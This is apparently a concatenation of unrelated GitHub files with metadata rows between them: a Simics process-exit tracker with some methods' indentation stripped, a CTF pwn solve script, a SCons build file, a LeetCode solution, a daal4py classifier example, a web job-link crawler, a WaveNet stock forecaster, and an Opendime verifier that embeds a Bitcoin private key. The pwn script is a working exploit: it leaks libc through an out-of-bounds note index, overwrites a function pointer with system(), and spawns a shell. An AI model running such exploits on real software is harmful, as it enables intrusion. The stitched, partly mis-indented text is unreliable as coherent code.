        if pid in self.demise_cache:
            self.demise_cache.remove(pid)
    def taskRecHap(self, pid, third, forth, memory):
        ''' Fired when the task-list pointer watched for pid's demise is
            written.  Either the record moved (reset the watch) or the pid
            actually exited (report exit / remove the task). '''
        self.lgr.debug('taskRecHap pid %d' % pid)
        if pid not in self.task_rec_hap or pid in self.demise_cache:
            return
        dumb, comm, cur_pid = self.task_utils.curProc()
        self.lgr.debug('contextManager taskRecHap demise of pid:%d by the hand of cur_pid %d?' % (pid, cur_pid))
        dead_rec = self.task_utils.getRecAddrForPid(pid)
        if dead_rec is not None:
            if pid != cur_pid:
                self.lgr.debug('contextManager taskRecHap got record 0x%x for %d, call resetAlone' % (dead_rec, pid))
                # defer work out of hap context; demise_cache suppresses re-entry
                self.demise_cache.append(pid)
                SIM_run_alone(self.resetAlone, pid)
            else:
                self.lgr.debug('Pid %d messing with its own task rec?  Let it go.' % pid)
        else:
            value = SIM_get_mem_op_value_le(memory)
            self.lgr.debug('contextManager taskRecHap pid:%d wrote 0x%x to 0x%x watching for demise of %d' % (cur_pid, value, memory.logical_address, pid))
            exit_syscall = self.top.getSyscall(self.cell_name, 'exit_group')
            if exit_syscall is not None and not self.watching_page_faults:
                ida_msg = 'pid:%d exit via kill?' % pid
                self.killGroup(pid, exit_syscall)
                #exit_syscall.handleExit(pid, ida_msg, killed=True)
            else:
                self.rmTask(pid)
            if self.exit_callback is not None:
                self.exit_callback()
    def setExitCallback(self, callback):
        ''' Register a function to call when a watched process exits. '''
        self.exit_callback = callback
def watchGroupExits(self):
dumb, comm, cur_pid = self.task_utils.curProc()
leader_pid = self.task_utils.getGroupLeaderPid(cur_pid)
if leader_pid is None:
self.lgr.error('contextManager watchGroupExits no group leader for %d' % cur_pid)
self.lgr.debug('contextManager watchGroupExit cur_pid %d, leader %d' % (cur_pid, leader_pid))
pid_dict = self.task_utils.getGroupPids(leader_pid)
for pid in pid_dict:
self.watchExit(rec=pid_dict[pid], pid=pid)
    def watchExit(self, rec=None, pid=None):
        retval = True
        ''' set breakpoint on task record that points to this (or the given) pid '''
        #self.lgr.debug('contextManager watchExit')
        dumb, comm, cur_pid = self.task_utils.curProc()
        if pid is None and cur_pid == 1:
            self.lgr.debug('watchExit for pid 1, ignore')
            return False
        if pid is None:
            # default to the currently scheduled process
            pid = cur_pid
            rec = self.task_utils.getCurTaskRec()
        if rec is None:
            self.lgr.error('contextManager watchExit failed to get list_addr pid %d cur_pid %d ' % (pid, cur_pid))
            return False
        list_addr = self.task_utils.getTaskListPtr(rec)
        if list_addr is None:
            ''' suspect the thread is in the kernel, e.g., on a syscall, and has not yet been formally scheduled, and thus
                has no place in the task list?  OR all threads share the same next_ts pointer'''
            #self.lgr.debug('contextManager watchExit failed to get list_addr pid %d cur_pid %d rec 0x%x' % (pid, cur_pid, rec))
            return False
        if pid not in self.task_rec_bp or self.task_rec_bp[pid] is None:
            watch_pid, watch_comm = self.task_utils.getPidCommFromNext(list_addr)
            # NOTE(review): both branches assign default_context; the resim
            # alternative is commented out, so the if/else is currently moot.
            if watch_pid in self.pid_cache:
                #cell = self.resim_context
                cell = self.default_context
            else:
                cell = self.default_context
                #cell = self.resim_context
            #self.lgr.debug('Watching next record of pid:%d (%s) for death of pid:%d' % (watch_pid, watch_comm, pid))
            self.task_rec_bp[pid] = SIM_breakpoint(cell, Sim_Break_Linear, Sim_Access_Write, list_addr, self.mem_utils.WORD_SIZE, 0)
            #bp = self.genBreakpoint(cell, Sim_Break_Linear, Sim_Access_Write, list_addr, self.mem_utils.WORD_SIZE, 0)
            #self.lgr.debug('contextManager watchExit cur pid:%d set list break %d at 0x%x for pid %d context %s' % (cur_pid, self.task_rec_bp[pid], 
            #      list_addr, pid, str(cell)))
            #self.task_rec_hap[pid] = self.genHapIndex("Core_Breakpoint_Memop", self.taskRecHap, pid, bp)
            #self.lgr.debug('contextManager watchExit pid %d bp: %d' % (pid, self.task_rec_bp[pid]))
            self.task_rec_hap[pid] = SIM_hap_add_callback_index("Core_Breakpoint_Memop", self.taskRecHap, pid, self.task_rec_bp[pid])
            self.task_rec_watch[pid] = list_addr
        else:
            #self.lgr.debug('contextManager watchExit, already watching for pid %d' % pid)
            pass
        return retval
    def auditExitBreaks(self):
        ''' Diagnostic: verify that each recorded task-list watch address
            still matches what taskUtils reports for the pid. '''
        for pid in self.task_rec_watch:
            rec = self.task_utils.getRecAddrForPid(pid)
            if rec is None:
                self.lgr.debug('contextManager auditExitBreaks failed to get task record for pid %d' % pid)
            else:
                list_addr = self.task_utils.getTaskListPtr(rec)
                if list_addr is None:
                    ''' suspect the thread is in the kernel, e.g., on a syscall, and has not yet been formally scheduled, and thus
                        has no place in the task list? '''
                    self.lgr.debug('contextManager auditExitBreaks failed to get list_addr pid %d rec 0x%x' % (pid, rec))
                elif self.task_rec_watch[pid] is None:
                    watch_pid, watch_comm = self.task_utils.getPidCommFromNext(list_addr)
                    self.lgr.debug('contextManager auditExitBreaks rec_watch for %d is None, but taskUtils reports %d' % (pid, watch_pid))
                elif list_addr != self.task_rec_watch[pid]:
                    watch_pid, watch_comm = self.task_utils.getPidCommFromNext(list_addr)
                    prev_pid, prev_comm = self.task_utils.getPidCommFromNext(self.task_rec_watch[pid])
                    # NOTE(review): arguments appear swapped -- "was watching" is
                    # formatted with watch_pid (the new one) and "now" with
                    # prev_pid (the old one); confirm intended order.
                    self.lgr.debug('contextManager auditExitBreaks changed in record watch for death of %d, was watching %d, now %d' % (pid, watch_pid, prev_pid))
def setExitBreaks(self):
#self.lgr.debug('contextManager setExitBreaks')
for pid in self.task_rec_bp:
rec = self.task_utils.getRecAddrForPid(pid)
self.watchExit(rec, pid)
    def clearExitBreaks(self):
        ''' Remove the Simics breakpoints and haps watching for task exits;
            the dict entries are kept (set to None) so setExitBreaks can
            re-arm them later. '''
        self.lgr.debug('contextManager clearExitBreaks')
        for pid in self.task_rec_bp:
            if self.task_rec_bp[pid] is not None:
                SIM_delete_breakpoint(self.task_rec_bp[pid])
                self.task_rec_bp[pid] = None
                #self.lgr.debug('contextManager clearExitBreaks pid:%d' % pid)
        for pid in self.task_rec_hap:
            if self.task_rec_hap[pid] is not None:
                SIM_hap_delete_callback_id("Core_Breakpoint_Memop", self.task_rec_hap[pid])
                self.task_rec_hap[pid] = None
    def resetBackStop(self):
        # No-op; present so callers can invoke it uniformly on managers.
        pass
    def getIdaMessage(self):
        ''' Return the current IDA message string. '''
        return self.ida_message
    def getDebugPid(self):
        ''' Return (debugging_pid, cpu); debugging_pid is None when not debugging. '''
        return self.debugging_pid, self.cpu
def showIdaMessage(self):
print 'genMonitor says: %s' % self.ida_message
self.lgr.debug('genMonitor says: %s' % self.ida_message)
    def setIdaMessage(self, message):
        ''' Record the message to be shown by the IDA client. '''
        #self.lgr.debug('ida message set to %s' % message)
        self.ida_message = message
    def getRESimContext(self):
        ''' Return the RESim (debug) context object. '''
        return self.resim_context
    def getDefaultContext(self):
        ''' Return the default (non-debug) context object. '''
        return self.default_context
    def watchPageFaults(self, watching):
        ''' Record whether page faults are being watched (alters exit handling). '''
        self.watching_page_faults = watching
    def callMe(self, pageFaultGen):
        ''' Late-bind the pageFaultGen component -- presumably to avoid a
            circular dependency at construction time; TODO confirm. '''
        self.pageFaultGen = pageFaultGen
| [
"mfthomps@nps.edu"
] | mfthomps@nps.edu |
2e3157f0b093f2638437aa07b0c09b42299befbf | 5b6269ad53eb8c3f4eae21c3b4a0667527e75172 | /Challenges/Pwn/notepad--/solve.py | e0ba8f9166d9945089eb2a713fcf867b05ae7194 | [] | no_license | NUSGreyhats/welcome-ctf-2021 | 15c28dc7aaab91b0c939a08caaf907454213235a | eda2a0e5ffd6293aafbabab141499c9c973b4d5f | refs/heads/main | 2023-08-03T21:31:15.779090 | 2021-09-07T15:05:11 | 2021-09-07T15:05:11 | 376,068,403 | 21 | 6 | null | null | null | null | UTF-8 | Python | false | false | 876 | py | from pwn import *
if args.REMOTE:
p = remote('localhost', 5001)
else:
p = process("./dist/notepad.o", env={'LD_PRELOAD': './dist/libc.so.6'})
e = ELF("./dist/notepad.o")
libc = ELF("./dist/libc.so.6")
def view_note(idx):
p.sendlineafter(">", "2")
p.sendlineafter("Index: ", str(idx))
def create_note(idx, name, content):
p.sendlineafter(">", "1")
p.sendlineafter("Index: ", str(idx))
p.sendafter("Name: ", name)
p.sendafter("Content: ", content)
view_note(-4)
p.recvuntil('Name: ')
name = p.recvline(keepends=False)
printf = u64(name.ljust(8, b'\0'))
info(f"printf = {hex(printf)}")
libc.address = printf - libc.symbols['printf']
success(f"libc = {hex(libc.address)}")
system = libc.symbols['system']
create_note(-5, p64(0)*2, p64(0) + p64(0) + p64(system) + p64(0))
create_note(0, "/bin/sh", "<bleh>")
view_note(0)
p.interactive() | [
"enigmatrix2000@gmail.com"
] | enigmatrix2000@gmail.com |
8f20c2f26ceb51e392dd210bf3dd5f07b794c615 | 2ff207e57902ccd0f1df23800c8f6e4628c06230 | /SConstruct | 76a19d372952617846cf8149f67131a16125506f | [] | no_license | mdrgon1/Z-1.5 | af1d2f0b49434017522e26f6e518ce658935c5a9 | a7ce5df6beb2bf616144d030456125398f3abe7e | refs/heads/master | 2022-12-02T07:12:55.506397 | 2020-07-28T05:56:09 | 2020-07-28T05:56:09 | 246,069,381 | 0 | 0 | null | 2020-07-28T05:53:14 | 2020-03-09T15:15:36 | C++ | UTF-8 | Python | false | false | 3,719 | #!python
import os, subprocess
opts = Variables([], ARGUMENTS)
# Gets the standard flags CC, CCX, etc.
env = DefaultEnvironment()
# Define our options
opts.Add(EnumVariable('target', "Compilation target", 'debug', ['d', 'debug', 'r', 'release']))
opts.Add(EnumVariable('platform', "Compilation platform", '', ['', 'windows', 'x11', 'linux', 'osx']))
opts.Add(EnumVariable('p', "Compilation target, alias for 'platform'", '', ['', 'windows', 'x11', 'linux', 'osx']))
opts.Add(BoolVariable('use_llvm', "Use the LLVM / Clang compiler", 'no'))
opts.Add(PathVariable('target_path', 'The path where the lib is installed.', 'project/bin/'))
opts.Add(PathVariable('target_name', 'The library name.', 'libterrainGen', PathVariable.PathAccept))
# Local dependency paths, adapt them to your setup
godot_headers_path = "godot-cpp/godot_headers/"
cpp_bindings_path = "godot-cpp/"
cpp_library = "libgodot-cpp"
# only support 64 at this time..
bits = 64
# Updates the environment with the option variables.
opts.Update(env)
# Process some arguments
if env['use_llvm']:
env['CC'] = 'clang'
env['CXX'] = 'clang++'
if env['p'] != '':
env['platform'] = env['p']
if env['platform'] == '':
print("No valid target platform selected.")
quit();
# For the reference:
# - CCFLAGS are compilation flags shared between C and C++
# - CFLAGS are for C-specific compilation flags
# - CXXFLAGS are for C++-specific compilation flags
# - CPPFLAGS are for pre-processor flags
# - CPPDEFINES are for pre-processor defines
# - LINKFLAGS are for linking flags
# Check our platform specifics
if env['platform'] == "osx":
env['target_path'] += 'osx/'
cpp_library += '.osx'
env.Append(CCFLAGS=['-arch', 'x86_64'])
env.Append(CXXFLAGS=['-std=c++17'])
env.Append(LINKFLAGS=['-arch', 'x86_64'])
if env['target'] in ('debug', 'd'):
env.Append(CCFLAGS=['-g', '-O2'])
else:
env.Append(CCFLAGS=['-g', '-O3'])
elif env['platform'] in ('x11', 'linux'):
env['target_path'] += 'x11/'
cpp_library += '.linux'
env.Append(CCFLAGS=['-fPIC'])
env.Append(CXXFLAGS=['-std=c++17'])
if env['target'] in ('debug', 'd'):
env.Append(CCFLAGS=['-g3', '-Og'])
else:
env.Append(CCFLAGS=['-g', '-O3'])
elif env['platform'] == "windows":
env['target_path'] += 'win64/'
cpp_library += '.windows'
# This makes sure to keep the session environment variables on windows,
# that way you can run scons in a vs 2017 prompt and it will find all the required tools
env.Append(ENV=os.environ)
env.Append(CPPDEFINES=['WIN32', '_WIN32', '_WINDOWS', '_CRT_SECURE_NO_WARNINGS'])
env.Append(CCFLAGS=['-W3', '-GR'])
if env['target'] in ('debug', 'd'):
env.Append(CPPDEFINES=['_DEBUG'])
env.Append(CCFLAGS=['-EHsc', '-MDd', '-ZI'])
env.Append(LINKFLAGS=['-DEBUG'])
else:
env.Append(CPPDEFINES=['NDEBUG'])
env.Append(CCFLAGS=['-O2', '-EHsc', '-MD'])
if env['target'] in ('debug', 'd'):
cpp_library += '.debug'
else:
cpp_library += '.release'
cpp_library += '.' + str(bits)
# make sure our binding library is properly includes
env.Append(CPPPATH=['.', godot_headers_path, cpp_bindings_path + 'include/', cpp_bindings_path + 'include/core/', cpp_bindings_path + 'include/gen/'])
env.Append(LIBPATH=[cpp_bindings_path + 'bin/'])
env.Append(LIBS=[cpp_library])
# tweak this if you want to use different folders, or more folders, to store your source code in.
env.Append(CPPPATH=['src/'])
sources = Glob('src/*.cpp')
library = env.SharedLibrary(target=env['target_path'] + env['target_name'] , source=sources)
Default(library)
# Generates help for the -h scons option.
Help(opts.GenerateHelpText(env))
| [
"50722677+TheLoveDoctor@users.noreply.github.com"
] | 50722677+TheLoveDoctor@users.noreply.github.com | |
d19481de277f3304a15ba5abd3e4aa8f62930e6d | 6a9b10d56619e254e1563714082d8f284410c311 | /Maxsum_Circular_Subarray.py | 859a9343c3c2e7e1f1a3d643ad89ca1e5af205ff | [] | no_license | syedmujahedalih/LeetCode-Submissions | c05bf820675bee2d47eb4a23b38074c9ed807bb6 | 87ffd4f14784a1fb8d4c94f5f8592c77f354d78f | refs/heads/master | 2022-11-18T11:21:16.089131 | 2020-07-12T10:20:23 | 2020-07-12T10:20:23 | 260,825,334 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 493 | py | class Solution(object):
def maxSubarraySumCircular(self, A):
def kadane(gen):
# Maximum non-empty subarray sum
ans = cur = None
for x in gen:
cur = x + max(cur, 0)
ans = max(ans, cur)
return ans
S = sum(A)
ans1 = kadane(iter(A))
ans2 = S + kadane(-A[i] for i in range(1, len(A)))
ans3 = S + kadane(-A[i] for i in range(len(A) - 1))
return max(ans1, ans2, ans3) | [
"syedmujahedalih@gmail.com"
] | syedmujahedalih@gmail.com |
dd4bd12c5b84fdef186166bf91e7fbfa998243fa | 51222a640bdfaf394af67601dc4e128f678743d3 | /dpc/examples/daal/gradient_boosted_classification_batch.py | f61614e29bc6e0633f53fe18c4a344e642728e37 | [] | no_license | pvelesko/testing | 8294f5cd9af5634460f3b597c582ce7ff22238d0 | 5bdc53da65f67596858825d023852f7457937211 | refs/heads/master | 2023-06-29T00:42:37.744462 | 2021-08-04T04:24:08 | 2021-08-04T04:30:37 | 392,545,407 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,983 | py | #*******************************************************************************
# Copyright 2014-2019 Intel Corporation
# All Rights Reserved.
#
# This software is licensed under the Apache License, Version 2.0 (the
# "License"), the following terms apply:
#
# You may not use this file except in compliance with the License. You may
# obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
# See the License for the specific language governing permissions and
# limitations under the License.
#*******************************************************************************
# daal4py Gradient Bossting Classification example for shared memory systems
import daal4py as d4p
import numpy as np
# Prefer pandas' fast C csv reader; fall back to numpy.loadtxt when pandas
# is not installed.  Both variants share one signature:
#   read_csv(f, c=None, t=np.float64) -> 2-D array-like of dtype t
# (columns *c*, comma-separated, no header row)
try:
    import pandas

    def read_csv(f, c=None, t=np.float64):
        """Read columns *c* of headerless csv file *f* as dtype *t*."""
        return pandas.read_csv(f, usecols=c, delimiter=',', header=None, dtype=t)
except ImportError:
    # fall back to numpy loadtxt; only a missing pandas should take this
    # branch (the original bare `except:` swallowed every error)
    def read_csv(f, c=None, t=np.float64):
        """Read columns *c* of headerless csv file *f* as dtype *t*."""
        return np.loadtxt(f, usecols=c, delimiter=',', ndmin=2, dtype=t)
def main(readcsv=read_csv, method='defaultDense'):
    """Train and evaluate a daal4py gradient boosted trees classifier.

    Reads the bundled train/test csv files (3 feature columns, 1 label
    column, 5 classes), trains, predicts on the test set and sanity-checks
    the misclassification rate.  Returns (train_result, predict_result,
    plabels).  `method` is accepted for symmetry with the other examples
    but is not used here.
    """
    infile = "./data/batch/df_classification_train.csv"
    testfile = "./data/batch/df_classification_test.csv"
    n_features = 3
    n_classes = 5
    # Configure a training object (5 classes, 200 boosting iterations).
    train_algo = d4p.gbt_classification_training(
        nClasses=n_classes,
        maxIterations=200,
        minObservationsInLeafNode=8,
        featuresPerNode=n_features,
    )
    # Columns 0-2 are the features, column 3 the class label.
    data = readcsv(infile, range(3), t=np.float32)
    labels = readcsv(infile, range(3, 4), t=np.float32)
    train_result = train_algo.compute(data, labels)
    # Predict on the held-out test file with the trained model.
    predict_algo = d4p.gbt_classification_prediction(nClasses=n_classes)
    pdata = readcsv(testfile, range(3), t=np.float32)
    predict_result = predict_algo.compute(pdata, train_result.model)
    # Compare against ground truth: the error rate must stay below 2.2%.
    plabels = readcsv(testfile, range(3, 4), t=np.float32)
    assert np.count_nonzero(predict_result.prediction - plabels) / pdata.shape[0] < 0.022
    return (train_result, predict_result, plabels)
if __name__ == "__main__":
    # Run the example end-to-end and show a sample of the predictions
    # next to the ground-truth labels.
    (train_result, predict_result, plabels) = main()
    print("\nGradient boosted trees prediction results (first 10 rows):\n", predict_result.prediction[0:10])
    print("\nGround truth (first 10 rows):\n", plabels[0:10])
    print('All looks good!')
| [
"paulius.velesko@intel.com"
] | paulius.velesko@intel.com |
2b02636ab2bc26a17af696eb2a897748dd8228e1 | 9acd885f9f36f2ceb967100840997ecc97e5bc77 | /kolichestvo _razlichniykh_chisel.py | 94250905c31d05a7fbd03af0da654ec795c34673 | [] | no_license | Botagoz-Ahm/Task-7 | b09bf5143baf377fcd801c193dfa27c59d32cb2b | 3b8d0d522ea7ff7ae79bfdbcdfdefbf2eab75c19 | refs/heads/master | 2022-06-03T22:53:27.375451 | 2020-05-02T18:56:42 | 2020-05-02T18:56:42 | 260,754,779 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 72 | py | myList = (input().split())
# `myList` (read from stdin above) holds whitespace-separated tokens;
# a set keeps only the distinct ones, so its length is the answer.
mySet = (len(set((myList))))
print(mySet)
| [
"noreply@github.com"
] | noreply@github.com |
33bc1e2ac77d709acd563907b448ccc28ff6f4e0 | 91ddffce1c5167d2b4b8c3fa0150ba68779fd771 | /Euler/problem1.py | 0aefbc36206a125553154df5e79773dc053becea | [] | no_license | elbuo8/PythonSnips | 8a1a5b91e5f4eff788fb4af6a79edb467d9e3448 | 8db0cc37651dbd88df8cfa6b79291bb5deec1c7b | refs/heads/master | 2021-01-15T21:01:57.517386 | 2012-06-14T14:20:03 | 2012-06-14T14:20:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 147 | py | '''
Created on Jun 7, 2012
@author: yamilasusta
'''
# Project Euler #1: sum of the natural numbers below 1000 that are
# multiples of 3 or 5.  The original used the Python-2-only statement
# `print total`; the generator-expression + function-call form below
# produces identical output on both Python 2 and 3.
total = sum(i for i in range(1000) if i % 3 == 0 or i % 5 == 0)
print(total)
| [
"yamil.asusta@upr.edu"
] | yamil.asusta@upr.edu |
c8a6e95a98f1348bd94cef5d52e00616ec83951d | 086f048af5006329ab2697e23485a5b3be5bd46b | /link_finder.py | 168c75713e3f174da9f01c1654bfb566e825b1a9 | [] | no_license | derekwang1994/Web-Crawler---Python | b0d41cf74dd64a3bb4d5da842c7e7039b053a0e6 | 4c6401f7ef42a2d76ddb1caa78168f5840966a0c | refs/heads/master | 2021-01-19T23:02:16.042192 | 2017-09-15T00:55:29 | 2017-09-15T00:55:29 | 101,261,973 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,534 | py | from html.parser import HTMLParser
from urllib import parse
from general import *
class LinkFinder(HTMLParser):
    """HTMLParser that collects absolute links and keyword-matching job ads.

    base_url -- site root used to absolutize relative hrefs
    page_url -- URL of the page being parsed (kept for reference)
    keywords -- substrings; an <a> whose title contains one is recorded
                as a job in ``self.jobs``
    """

    def __init__(self, base_url, page_url, keywords):
        super().__init__()
        self.base_url = base_url
        self.page_url = page_url
        self.links = set()   # absolute URLs of every <a href=...> seen
        self.jobs = set()    # JSON-fragment strings for matching job links
        self.keywords = keywords

    # Called by HTMLParser.feed() for every opening tag.
    def handle_starttag(self, tag, attrs):
        if tag == 'a':
            self.find_job(attrs)
            for attribute, value in attrs:
                if attribute == 'href':
                    # Absolutize the link against the site root.
                    self.links.add(parse.urljoin(self.base_url, value))

    def page_links(self):
        """Return the set of absolute links collected so far."""
        return self.links

    def error(self, message):
        # Ignore malformed markup instead of aborting the crawl.
        pass

    def find_job(self, attrs):
        """Record an <a> tag as a job when its title matches a keyword."""
        url = ''
        title = ''
        # Iterate the (attribute, value) pairs directly instead of the
        # original C-style index loop with repeated attrs[i][...] lookups.
        for attribute, value in attrs:
            if attribute == 'href':
                url = value
            elif attribute == 'title' and any(keyword in value for keyword in self.keywords):
                title = value
        if url and title:
            self.jobs.add('{ "Title" : "' + title + '", "URL" : "' + parse.urljoin(self.base_url, url) + '" },')
def get_jobs(self):
return self.jobs | [
"derekwang1994@yahoo.com"
] | derekwang1994@yahoo.com |
a768c2a7f1da1af77af686f85ec3b9cabda981a8 | 9f129912443acf712166209155fe071518cafa63 | /wavenet.py | b13f48c5544da960dfc5d016eba79f8a4443b834 | [] | no_license | KNFO-MIMUW/Stock_Prices_Prediction | 740b4c429caf40b1058289bfb56b6751070cb4ee | 4027642f5159aecd3d0347c6c39e19db3264cf39 | refs/heads/master | 2020-04-06T14:10:52.443302 | 2019-05-20T17:24:50 | 2019-05-20T17:24:50 | 157,531,020 | 6 | 5 | null | null | null | null | UTF-8 | Python | false | false | 6,646 | py | """
Time series forecasting based on:
1. A. Borovykh, S. Bohte, and C. W. Oosterlee, "Conditional Time Series Forecasting with Convolutional
Neural Networks", arXiv:1703.04691, Mar. 2017.
2. Google DeepMind, "Wavenet: A generative model for raw audio", arXiv:1609.03499, Sep. 2016.
3. K. Papadopoulos, "SeriesNet: A Dilated Casual Convolutional Neural Network for Forecasting" Apr. 2018
Requirements:
tensorflow==1.10.1
Keras==2.2.2
numpy==1.14.5
matplotlib==3.0.0
"""
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn.metrics import mean_absolute_error
from keras.layers import Conv1D, Input, Add, Activation, Dropout
from keras.models import Model
from keras.regularizers import l2
from keras.initializers import TruncatedNormal
from keras import optimizers
###
### DATA PREPARATION
###
# Read ford's data.
ford_data = pd.read_csv('f_us_d.csv', header=0, parse_dates=[0], index_col=0, squeeze=True)
ford_data = ford_data.truncate(before="2012-01-01", after="2015-12-31")
series_ford = ford_data[['Open']]
# Read s&p's data
# stock_data = pd.read_csv('s&p_d.csv', header=0, parse_dates=[0], index_col=0, squeeze=True)
# stock_data = stock_data.truncate(before="2000-01-01", after="2003-12-31")
# series_stock_high = stock_data[['High']]
# series_stock_low = stock_data[['Low']]
TEST_RATIO = 0.80
vseries = series_ford.values
split_val = int(TEST_RATIO * vseries.size)
dataset, tests = vseries[:split_val], vseries[split_val:]
dataset = [x[0] for x in dataset]
tests = [x[0] for x in tests]
tests = np.array(tests)
# v_high, v_low = series_stock_high.values, series_stock_low.values
# split_val_h, split_val_l = int(TEST_RATIO * v_high.size), int(TEST_RATIO * v_low.size)
# dataset_high, dataset_low = v_high[:split_val_h], v_low[:split_val_l]
# dataset_high, dataset_low = [x[0] for x in dataset_high], [x[0] for x in dataset_low]
###
### BUILD MODEL
###
def DC_CNN_Block(nb_filter, filter_length, dilation, l2_layer_reg):
def f(input_):
residual = input_
layer_out = Conv1D(filters=nb_filter, kernel_size=filter_length,
dilation_rate=dilation,
activation='relu', padding='causal', use_bias=False,
kernel_initializer=TruncatedNormal(mean=0.0, stddev=0.05,
seed=11), kernel_regularizer=l2(l2_layer_reg))(input_)
layer_out = Activation('relu')(layer_out)
skip_out = Conv1D(1, 1, activation='relu', use_bias=False,
kernel_initializer=TruncatedNormal(mean=0.0, stddev=0.05,
seed=11), kernel_regularizer=l2(l2_layer_reg))(layer_out)
network_in = Conv1D(1, 1, activation='relu', use_bias=False,
kernel_initializer=TruncatedNormal(mean=0.0, stddev=0.05,
seed=11), kernel_regularizer=l2(l2_layer_reg))(layer_out)
network_out = Add()([residual, network_in])
return network_out, skip_out
return f
def DC_CNN_Model(length):
input = Input(shape=(length, 1))
l1a, l1b = DC_CNN_Block(32, 2, 1, 0.001)(input)
l2a, l2b = DC_CNN_Block(32, 2, 2, 0.001)(l1a)
l3a, l3b = DC_CNN_Block(32, 2, 4, 0.001)(l2a)
l4a, l4b = DC_CNN_Block(32, 2, 8, 0.001)(l3a)
l5a, l5b = DC_CNN_Block(32, 2, 16, 0.001)(l4a)
l6a, l6b = DC_CNN_Block(32, 2, 32, 0.001)(l5a)
l7a, l7b = DC_CNN_Block(32, 2, 64, 0.001)(l6a)
# l7b = Dropout(0.1)(l7b)
l8a, l8b = DC_CNN_Block(32, 2, 128, 0.001)(l7a)
# l8b = Dropout(0.2)(l8b)
# l9a, l9b = DC_CNN_Block(32, 2, 256, 0.001)(l8a)
# l9b = Dropout(0.3)(l9b)
# l10a, l10b = DC_CNN_Block(32, 2, 512, 0.001)(l9a)
# l10b = Dropout(0.6)(l10b)
lx = Add()([l1b, l2b, l3b, l4b, l5b, l6b, l7b, l8b])#, l9b])#, l10b])
lf = Activation('relu')(lx)
output_l = Conv1D(1, 1, activation='relu', use_bias=False,
kernel_initializer=TruncatedNormal(mean=0, stddev=0.05, seed=11),
kernel_regularizer=l2(0.001))(lf)
model = Model(input=input, output=output_l)
adam = optimizers.Adam(lr=0.00075, beta_1=0.9, beta_2=0.999, epsilon=None,
decay=0.0, amsgrad=False)
model.compile(optimizer=adam, loss='mae', metrics=['mse'])
return model
def evaluate_timeseries(timeseries, predict_size):
timeseries = timeseries[~pd.isna(timeseries)]
length = len(timeseries) - 1
timeseries = np.atleast_2d(np.asarray(timeseries))
if timeseries.shape[0] == 1:
timeseries = timeseries.T
model = DC_CNN_Model(length)
print('\nInput size: {}\nOutput size: {}'.
format(model.input_shape, model.output_shape))
model.summary()
X = timeseries[:-1].reshape(1, length, 1)
y = timeseries[1:].reshape(1, length, 1)
model.fit(X, y, epochs=1000)
pred_array = np.zeros(predict_size).reshape(1, predict_size, 1)
observation = np.zeros(predict_size).reshape(1, predict_size, 1)
X_test_initial = timeseries[1:].reshape(1, length, 1)
for i in range(predict_size):
observation[:, i, :] = tests[i]
pred_array[:, 0, :] = model.predict(X_test_initial)[:, -1:, :]
# Forecast is based on the observations up to previous day.
for i in range(predict_size - 1):
pred_array[:, i + 1:, :] = model.predict(
np.append(X_test_initial[:, i + 1:, :], observation[:, :i + 1, :])
.reshape(1, length, 1), batch_size=32)[:,-1:, :]
# stddev = (dataset_high[i + 1] - dataset_low[i + 1]) / dataset_high[i + 1]
# pred_array[:, i + 1:, :] = model.predict(np.append(X_test_initial[:, i + 1:, :], np.random.normal(observation[:, :i + 1, :], stddev)).reshape(1, length, 1))[:, -1:, :]
# Forecast for the next day based on the predictions.
#
# pred_array[:, i + 1:, :] = model.predict(np.append(X_test_initial[:, i + 1:, :],
# pred_array[:, :i + 1, :])
# .reshape(1, length, 1))[:, -1:, :]
return pred_array.flatten()
predictions = evaluate_timeseries(np.array(dataset), len(tests))
mae = mean_absolute_error(tests, predictions)
print('Loss (mean absolute error): ', mae)
# plt.plot(dataset + tests, color='yellow')
# plt.plot(dataset, color='orange')
plt.plot(tests, color='orange', label='True data')
plt.plot(predictions, label= 'Predictions')
plt.legend(loc='upper left')
plt.xlabel('Days')
plt.ylabel('Price')
plt.show()
| [
"noreply@github.com"
] | noreply@github.com |
64eeead6469a2f19391005c14238c5e10af48198 | f402071c3b454ab12377e835306b8e8d5d961767 | /v2.4/unsealed/advanced/rngverify.py | a7ce687167a2e6c08126e4a97c5395d70bbb6e92 | [] | no_license | opendime/opendime | 2f47ec08a5c51082590c7246a2579c7517f7a1ea | 396c52085c22242346258f839093fe15b850d85b | refs/heads/master | 2021-11-13T21:52:47.583955 | 2021-10-29T23:28:43 | 2021-10-29T23:28:43 | 59,141,180 | 131 | 30 | null | 2021-10-29T23:28:44 | 2016-05-18T18:28:08 | HTML | UTF-8 | Python | false | false | 2,597 | py | #!/usr/bin/env python
from __future__ import print_function
from binascii import a2b_hex
ADDRESS = '1P431tezawsLq7ZDPqfp8CnGGKxuYpLTKR '.strip()
PRIVKEY = '5K6QFi35PZaHqrP1G3wLv7n8sV29cmz2tU4gkMYzfTkEx463NkJ'.strip()
OD_NONCE = a2b_hex('7a4deec6d8714f9e03988603789d20fa6cc3fb7921a6e51e0f4e5de75b3d3813')
SECRET_EXPONENT = a2b_hex('a8498ba6db5d470dd40db3dd0508b15f1fadd828bc4db16d7a4b64d0c5ba8f1e')
CHIP_SERIAL = b'JETJEECBIZIFCIBAEBGDGBIU74'
# The above numbers can be used to prove we picked the private key using
# an algorithm that included the entropy values you provided, and therefore
# does not allow us any access to the funds. This program checks our math.
#
# Usage:
# python rngverify.py keepme.bin
#
# Example (simplified, MacOS X):
#
# dd if=/dev/urandom bs=256k count=1 > ~/keepme.bin
# diskutil info /Volumes/OPENDIME/ | grep /dev/disk
# ==> replace /dev/diskXXX in next line -- be VERY careful!! <==
# sudo dd if=~/keepme.bin of=/dev/diskXXX
# (.. device will self-eject ..)
# (.. time passes, then unseal opendime ..)
# python /Volumes/OPENDIME/advanced/rngverify.py ~/keepme.bin
#
#
import os, sys
from hashlib import sha256

SIZE = 256*1024

# Step 1: load the customer-provided entropy file (must be exactly 256 KiB).
try:
    assert len(sys.argv) >= 2, "entropy data filename required"
